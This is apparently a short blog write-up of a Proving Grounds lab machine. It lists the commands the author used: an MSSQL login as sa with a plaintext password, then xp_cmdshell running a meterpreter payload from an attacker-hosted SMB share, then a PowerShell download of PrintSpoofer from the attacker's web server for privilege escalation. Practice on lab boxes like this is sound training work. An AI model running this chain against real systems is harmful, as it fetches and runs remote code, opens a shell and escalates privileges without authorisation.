PG Meathead

impacket-mssqlclient sa:EjectFrailtyThorn425@192.168.230.70 -p 1435
smbserver.py Share .
xp_cmdshell \\192.168.49.210\Share\power.exe (meterpreter shell)
powershell Invoke-WebRequest -OutFile C:\Users\Public\Documents\PrintSpooferx64.exe -Uri http://192.168.49.210/PrintSpooferx64.exe

Box is hard. Only got shell. Had to lookup walkthroughs. Its okay, as long as I learn something and don't repeat the same mistake again. I'll be using smbserver over http.server, just to get the hang of it. It will become a permanent jutsu of mine from now on.

Lessons Learned

  1. Set up a smbserver.py if downloading is not working and/or Antivirus is getting in the way.
  2. My PrintSpoofer worked. Metasploit getsystem will also use PrintSpoofer.
  3. First Hard Box on PG attempted.

Comments

Popular posts from this blog

Palo Alto for GNS3 CCDC Tutorial

Trace Labs Global Missing Persons CTF V

Release of CCDC ISE Manager Website